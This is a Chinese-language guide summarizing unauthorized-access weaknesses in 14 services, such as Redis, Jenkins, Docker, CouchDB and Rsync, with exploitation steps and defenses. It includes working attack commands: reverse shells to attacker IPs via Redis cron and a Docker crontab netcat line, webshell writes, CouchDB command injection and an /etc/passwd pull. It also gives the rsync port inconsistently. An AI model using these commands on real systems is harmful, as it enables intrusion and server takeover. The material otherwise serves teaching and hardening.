常见未授权访问漏洞总结
字数 2153 2025-09-29 20:06:32
常见未授权访问漏洞总结与防御指南
Redis 未授权访问漏洞
漏洞简介与危害
- Redis默认绑定在0.0.0.0:6379
- 无密码认证时,攻击者可未授权访问并读取数据
- 攻击者可利用config命令进行写文件操作,包括:
- 写入SSH公钥实现登录
- 添加计划任务
- 写入Webshell
漏洞利用方法
-
环境搭建:
wget http://download.redis.io/releases/redis-2.8.17.tar.gz tar xzvf redis-2.8.17.tar.gz cd redis-2.8.17 make cd src/ cp redis-server /usr/bin/ cp redis-cli /usr/bin/ cd .. cp redis.conf /etc/ redis-server /etc/redis.conf -
未授权访问测试:
- 使用Redis客户端直接连接无需认证
-
写入Webshell:
config set dir /var/www/html config set dbfilename test.php set webshell "<?php phpinfo(); ?>" save -
计划任务反弹Shell:
nc -lvnp 5555 # 攻击机监听 config set dir /var/spool/cron set -.- "\n\n\n*bash -i >& /dev/tcp/192.168.15.3/5555 0>&1\n\n\n" config set dbfilename root save
防御措施
- 禁止使用root权限启动Redis
- 启用密码认证
- 添加IP访问限制
- 更改默认6379端口
MongoDB 未授权访问漏洞
漏洞简介与危害
- 默认无认证,攻击者可通过默认端口(27017)任意操作数据库
- 可执行增删改查等高危操作
漏洞利用方法
-
环境搭建:
docker pull mongo docker run -d -p 27017:27017 --name mongodb mongo -
未授权访问测试:
- 使用NoSQLBooster等工具直接连接
防御措施
- 启动时添加--auth参数
- 为MongoDB添加用户
- 禁用HTTP服务(--nohttpinterface)
- 绑定IP(bind_ip = 127.0.0.1)
Jenkins 未授权访问漏洞
漏洞简介与危害
- 默认允许通过脚本执行界面操作系统命令
- 攻击者可获取服务器权限
漏洞利用方法
-
环境搭建:
wget http://mirrors.jenkins.io/debian/jenkins_1.621_all.deb dpkg -i jenkins_1.621_all.deb service jenkins start -
命令执行:
println "whoami".execute().text -
写入Webshell:
new File("/var/www/html/shell.php").write('<?php phpinfo(); ?>')
防御措施
- 升级最新版本
- 添加强密码认证
- 禁止公网直接暴露Jenkins
Memcached 未授权访问漏洞
漏洞简介与危害
- 默认无权限控制模块
- 攻击者可读取Memcached中的敏感信息
漏洞利用方法
-
环境搭建:
- Windows: 下载并安装memcached-win64-1.4.4-14.zip
- 启动服务:
memcached.exe -d start
-
未授权访问测试:
telnet 10.0.4.138 11211 stats # 查看服务状态
防御措施
- 限制Memcached只允许本地访问
- 禁止外网访问11211端口
- 配置访问控制策略
JBoss 未授权访问漏洞
漏洞简介与危害
- 默认情况下访问
/jmx-console无需认证 - 可部署恶意war包获取服务器权限
漏洞利用方法
-
环境搭建:
docker pull testjboss/jboss:latest docker run -p 8080:8080 -d 5661a2e31006 -
未授权访问测试:
- 访问
http://ip:8080/jmx-console/
- 访问
-
部署恶意war包:
- 通过jboss.deployment功能上传webshell
防御措施
- 对jmx控制页面添加访问验证
- 进行JMX Console安全配置
VNC 未授权访问漏洞
漏洞简介与危害
- 默认端口5900、5901
- 无认证时可直接控制目标主机
漏洞利用方法
-
环境搭建:
- 下载安装RealVNC
-
未授权访问测试:
vncviewer 192.168.15.8
防御措施
- 配置VNC客户端登录口令认证
- 设置强密码
- 以普通权限运行
Docker 未授权访问漏洞
漏洞简介与危害
- Docker Remote API(2375端口)未授权访问
- 可新建/删除container,甚至获取宿主机shell
漏洞利用方法
-
环境搭建:
docker-compose build && docker-compose up -d -
未授权访问测试:
docker -H tcp://192.168.15.5:2375 version -
反弹宿主机Shell:
# 进入容器并修改crontab echo 'usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root
防御措施
- 对2375端口做网络访问控制
- 使用TLS认证
ZooKeeper 未授权访问漏洞
漏洞简介与危害
- 默认端口2181无认证
- 攻击者可收集敏感信息或破坏集群
漏洞利用方法
-
环境搭建:
wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gz tar -xzvf zookeeper-3.4.14.tar.gz cd zookeeper-3.4.14/conf mv zoo_sample.cfg zoo.cfg ../bin/zkServer.sh start -
未授权访问测试:
echo envi|nc 172.16.2.251 2181
防御措施
- 修改默认端口
- 添加访问控制
- 配置认证
Rsync 未授权访问漏洞
漏洞简介与危害
- 默认端口837允许匿名访问
- 可读取/写入任意文件
漏洞利用方法
-
环境搭建:
docker-compose build && docker-compose up -d -
未授权访问测试:
rsync rsync://172.16.2.250:873/ -
下载文件:
rsync rsync://172.16.2.250:873/src/etc/passwd ./
防御措施
- 配置认证用户名及密码
- 合理设置权限
- 控制接入源IP
Atlassian Crowd 未授权访问漏洞
漏洞简介与危害
- pdkinstall开发插件错误启用
- 可安装恶意插件执行任意代码
漏洞利用方法
-
环境搭建:
wget https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.4.3.zip unzip atlassian-crowd-3.4.3.zip cd atlassian-crowd-3.4.3 ./start_crowd.sh -
上传恶意插件:
curl --form "file_cdl=@applinks-plugin-5.4.12.jar" http://192.168.18.138:8095/crowd/admin/uploadplugin.action -v
防御措施
- 限制访问源IP
- 升级到3.5.0以上版本
CouchDB 未授权访问漏洞
漏洞简介与危害
- 默认5984端口Restful API无认证
- 可执行任意命令
漏洞利用方法
-
环境搭建:
docker-compose up -d -
命令执行:
curl -X PUT 'http://192.168.18.129:5984/_config/query_servers/cmd' -d '"curl http://192.168.18.138:9999/test.php"'
防御措施
- 绑定指定IP
- 设置访问密码
Elasticsearch 未授权访问漏洞
漏洞简介与危害
- 默认9200/9300端口无认证
- 可对数据进行任意操作
漏洞利用方法
-
环境搭建:
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip unzip elasticsearch-5.5.0.zip cd elasticsearch-5.5.0/bin ./elasticsearch -
未授权访问测试:
curl http://localhost:9200/_nodes
防御措施
- 限制IP访问
- 为9200端口设置认证
Hadoop 未授权访问漏洞
漏洞简介与危害
- 50070 web端口未授权访问
- 可删除/下载数据或执行命令
漏洞利用方法
-
环境搭建:
docker-compose build && docker-compose up -d -
命令执行:
- 通过REST API提交恶意Application
防御措施
- 关闭不必要的Web管理页面
- 开启身份验证
- 限制可信任IP访问
Jupyter Notebook 未授权访问漏洞
漏洞简介与危害
- 未配置密码时未授权访问
- 可执行任意Python代码和命令
漏洞利用方法
-
环境搭建:
docker-compose up -d -
未授权访问测试:
- 访问
http://192.168.18.129:8888 - 通过Terminal执行命令
- 访问
防御措施
- 开启身份验证
- 限制IP访问
总结
本文总结了14种常见服务的未授权访问漏洞,包括漏洞原理、利用方法和防御措施。管理员应定期检查这些服务的配置,确保已采取适当的安全措施,防止未授权访问导致的安全事件。